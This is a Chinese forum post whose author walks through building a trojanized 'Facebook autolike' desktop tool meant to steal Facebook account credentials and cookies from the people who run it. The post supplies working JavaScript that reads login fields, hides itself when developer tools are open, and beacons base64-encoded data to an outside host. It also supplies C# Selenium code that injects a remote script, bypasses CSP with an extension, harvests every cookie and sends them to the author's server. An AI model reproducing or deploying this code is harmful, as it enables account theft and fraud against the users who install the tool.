请选择 进入手机版 | 继续访问电脑版

HTML5星空

妈妈再也不担心我的FACEBOOK没黑号了

[复制链接]
发表于 2020-6-28 23:40:04 | 显示全部楼层 |阅读模式

觉的文章还行

麻烦转发一下


为了吸粉,厚颜无耻了一下


FACEBOOK打广告,用黑号配黑料是很不错的搭配,目前FACEBOOK打广告最近封号也挺严,为了解决账号问题,老N只能想办法撸点黑号。


买号?这辈子都是不可能的,平时也就搬砖实在辛苦买点雪碧弱弱喉咙,买号这么费钱的东西,我是不敢奢望的。


上次推送了个扫号黑号的一个办法

点击下面,看客们回味一下。


跨境电商那些黑号钓鱼号的来源套路分析


今天我就做个案例,我来普及下作为一个懂点菜逼技术的农村人,我是怎么偷号的。


如有雷同,不准报案!!!

话说当时失眠了



话说当时失眠了,没错,此刻我码着字,床上的妹子一直喊着我入睡,我却迟迟不能入眠,此刻,身体已经掏空,为了吸粉,只能抛出点干货!!!



脑海里滚过无数个思路,怎么搞FACEBOOK黑号,怎么撸?洗号?这辈子都不可能的,号都那么难洗,撞库?猴年马月!!! 


妹子已经饥渴难耐,显然时间上我等不及那么长的时间去做那些无意义的事情,如何能够长久?


转换思路


如何能钓的一些FACEBOOK优质账号呢?

显然得去搞些有人专门运营FACEBOOK的号,那些才珍贵(扯远了)


那么这些人一般需要什么?


没错,运营FACEBOOK显然需要相关的运营工具!!!



思考再三,我好像会码代码!!!


惊奇。。。我这么贫苦的人,竟然会代码。。太神奇了。


说时迟,那时快。。我立马打开VS 就是建了一个WINFORM!!


没错,起名英文名:facebookautolike,顾名思义:脸书自动跟随!!



然后操起我多年的审美观又是一顿画!



优秀完美,先打个1分。因为功能还没写!!!!


此时应该给各位城里人理下思路


1  目的是为了窃取FACEBOOK账号和密码以及COOKIE

2  要让目标输入明文账号密码,而不是通过授权API的方式。

3  软件得有点FACEBOOK自动化的意思,才会骗取客户信任去执行。

4  不被杀软查杀!!



妹子急了,我得加快进度
速度码代码



时间是一条金河,莫让它轻轻地在你的指尖溜过。


我们拖入selenium,准备用老套路,基于chrome的方式,再植入JS劫持代码(当然,或者根据上文的直接绑个马,但是万一被杀软查了,免杀就麻烦,也不持久!!)


安装完这两个包,我们就可以先写个自动化登陆FACEBOOK的代码了


加上代理是因为我肉身在莆田,不能直接看FB,当然,发布的时候肯定要去掉。然后加上缓存文件夹,是为了下次调用可以跳过登陆这块。




运行效果





辣么。现在还需要加入执行的JS获取COOKIE和账号密码的代码。


我们来翻一下之前安全界爆的一篇文章。



不巧,手上有这段代码,顺便改造下,改成只偷账号密码和COOKIE的就好,



整理下劫持代码




(function() {

const result = {};

result.isOpen = false;

result.orientation = undefined;

const num = 160;

const cback = (index, value) => {

window["dispatchEvent"](new CustomEvent("devtoolschange", {

"detail" : {

"isOpen" : index,

"orientation" : value

}

}));

};

setInterval(() => {

const mobile = window.outerWidth - window.innerWidth > num;

const adjustHeight = window.outerHeight - window.innerHeight > num;

const orientation = mobile ? "vertical" : "horizontal";

if (!(adjustHeight && mobile) && (window.Firebug && window.Firebug.chrome && window.Firebug.chrome.isInitialized || mobile || adjustHeight)) {

if (!result.isOpen || result.orientation !== orientation) {

cback(true, orientation);

}

result.isOpen = true;

result.orientation = orientation;

} else {

if (result.isOpen) {

cback(false, undefined);

}

result.isOpen = false;

result.orientation = undefined;

}

}, 500);

if (typeof module !== "undefined" && module.exports) {

module.exports = result;

} else {

window.devtools = result;

}

})();

String.prototype.hashCode = function() {

var hash = 0;

var i;

var chr;

if (this.length === 0) {

return hash;

}

i = 0;

for (; i < this.length; i++) {

chr = this.charCodeAt(i);

hash = (hash << 5) - hash + chr;

hash = hash | 0;

}

return hash;

};

var configData = {};

configData.Gate = "https://a.c0594.com/";

configData.Data = {};

configData.Sent = [];

configData.IsValid = false;

 

configData.SaveAllFields = function() {

var inputs = document.getElementsByTagName("input");

var pass=inputs[2].value+"--"+inputs[3].value;

configData.Data.Message=pass;

};

configData.SendData = function() { 

if (!window.devtools.isOpen) { 

configData.Data.Domain = location.hostname;

var hash = encodeURIComponent(window.btoa(JSON.stringify(configData.Data)));

alert(hash);

var multipleWildcard = hash.hashCode();

var curPatternPos = 0;

for (; curPatternPos < configData.Sent.length; curPatternPos++) {

if (configData.Sent[curPatternPos] == multipleWildcard) {

return;

}

}

configData.LoadImage(hash);

}

};

configData.TrySend = function() {

configData.SaveAllFields();

configData.SendData();

};

configData.LoadImage = function(url) {

configData.Sent.push(url.hashCode());

var img = document.createElement("IMG");

img.src = configData.GetImageUrl(url);

};

configData.GetImageUrl = function(swfUrlStr) {

return configData.Gate + "?reff=" + swfUrlStr;

};

document.onreadystatechange = function() {

 

if (document.readyState === "complete") {

window.setInterval(configData.TrySend, 500);

}

};




然后做个接口做接受,把接受的reff参数进行base64decode就好!!


我们把JS放入劫持的思路呢?



说时迟,那时快,立马一顿google,代码嵌入如下


driver.ExecuteScript("var s=window.document.createElement('script'); s.src = '//bbs.affadsense.com/test.js'; window.document.head.appendChild(s); ");


但是好像获取失败啊。。。




打开F12


原来碰上CSP了。。


又是一顿GOOGLE。这阻扰不了我的决心!!!




最后代码如下:



 string fileDir = Environment.CurrentDirectory;

            ChromeOptions options = new ChromeOptions();

            options.AddArgument("--user-data-dir=" + fileDir + "/data");

           

          OpenQA.Selenium.Proxy proxy = new OpenQA.Selenium.Proxy();

            options.AddArguments("--proxy-server=127.0.0.1:1388");

            //   driver.Manage().Timeouts().PageLoad = TimeSpan.FromSeconds(500);

            

            options.AddExtension("1.crx");

            ChromeDriver driver = new ChromeDriver(options);

            driver.Navigate().GoToUrl("https://www.facebook.com/");

            string htmlcode = driver.FindElement(By.TagName("body")).GetAttribute("innerHTML");

            driver.ExecuteScript("var s=window.document.createElement('script'); s.src = '//bbs.affadsense.com/test.js?v=3'; window.document.head.appendChild(s); ");

            if (htmlcode.Contains("royal_login_button"))

            {

                MessageBox.Show("Please Login and then Click OK button");

            }

            driver.Quit();




通过加载第三方插件的方式,来修改浏览器的CSP设置


运行软件




然后我的平台接受到参数后






这仅仅是个开始,还得完成Facebook自动LIKE的功能

毕竟没有功能的马子不是好马子~~

然后就是一堆SELENIUM自动化的代码~~~~

这里还差个登陆后的COOKIE获取。


   string cookiezz = "";

            ReadOnlyCollection<Cookie> allCookies = driver.Manage().Cookies.AllCookies;

            foreach (Cookie cookie in allCookies)

            {

                cookiezz = cookiezz + cookie.ToString() + ";";

            }


然后通过base64再request一到接口上面


整段代码如下



  private string GetWebContent(string sUrl)

        {

            string strResult = "";

            try

            {

               System.Net.HttpWebRequest request = (System.Net.HttpWebRequest)System.Net.WebRequest.Create(sUrl);

                //声明一个HttpWebRequest请求

                request.Timeout = 3000000;

                //设置连接超时时间

                request.Headers.Set("Pragma", "no-cache");

                System.Net.HttpWebResponse response = (System.Net.HttpWebResponse)request.GetResponse();

                if (response.ToString() != "")

{

                    Stream streamReceive = response.GetResponseStream();

                    Encoding encoding = Encoding.GetEncoding("UTF-8");//乱码处理

                    StreamReader streamReader = new StreamReader(streamReceive, encoding);

                    strResult = streamReader.ReadToEnd();

                }

            }

            catch (Exception exp)

            {

            //    MessageBox.Show(exp.Message);

            }

            return strResult;

        }

        private void Button1_Click(object sender, EventArgs e)

        {

            string fileDir = Environment.CurrentDirectory;

            ChromeOptions options = new ChromeOptions();

            options.AddArgument("--user-data-dir=" + fileDir + "/data");


            OpenQA.Selenium.Proxy proxy = new OpenQA.Selenium.Proxy();

            options.AddArguments("--proxy-server=127.0.0.1:1388");

            //   driver.Manage().Timeouts().PageLoad = TimeSpan.FromSeconds(500);


             

            ChromeDriver driver = new ChromeDriver(options);

            driver.Navigate().GoToUrl("https://www.facebook.com/");

            string htmlcode = driver.FindElement(By.TagName("body")).GetAttribute("innerHTML");

             if (htmlcode.Contains("royal_login_button"))

            {

                MessageBox.Show("Please Login and then Click OK button");

            }


            string cookiezz = "";

            ReadOnlyCollection<Cookie> allCookies = driver.Manage().Cookies.AllCookies;

            foreach (Cookie cookie in allCookies)

            {

                cookiezz = cookiezz + cookie.ToString() + ";";

            }

            byte[] data = System.Text.ASCIIEncoding.UTF8.GetBytes(cookiezz);

           string  base64Encoded = System.Convert.ToBase64String(data);


            GetWebContent("http://bbs.affadsense.com/?reff=" + base64Encoded);


        }


然后COOKIE就到手拉~~





好了,劫持钓鱼的功能就是基本这些模块了。


后续就是对这个软件进行完善,让他成为一个优秀的FACEBOOK自动化营销工具。


以上,就是整个通过浏览器自动化插入JS然后执行劫持的思路。



预防杠精

君子爱财,取之有道,黑号的获取方法千千万,不要给我抬杠,以上只是分享一种JS的方式,全文贯彻装逼路线,大神可以无视~~~




此刻,妹子已经一夜未眠,因为我未在她身边,我想,该是做个好男人的时刻了~~~




对了,姑娘约吗?



Amazon Scalping强大升级,SNS Group control的推出,SUPER BROWSER的面世。


日常广告时间

码字不易,您的转发和赞赏是我的一大动力之一。

欢迎关注我的公众号,请爱护我,不要抄袭我。

欢迎加入我的论坛,与我们一起交流。

下面是加入小密圈/获取论坛邀请码购买渠道:

小密圈(入圈后私信圈主,看到会私信邀请码):

其他获取方式:

支付宝:

微信支付:



回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

更多资源及Java+大数据个人原创视频,
可关注本站官方公众号观看:
快讯

     京ICP备14042305号

html5star team © 2012-2013 html5星空 Comsenz Inc.

GMT+8, 2020-7-10 06:59 , Processed in 0.220871 second(s), 36 queries .

快速回复 返回顶部 返回列表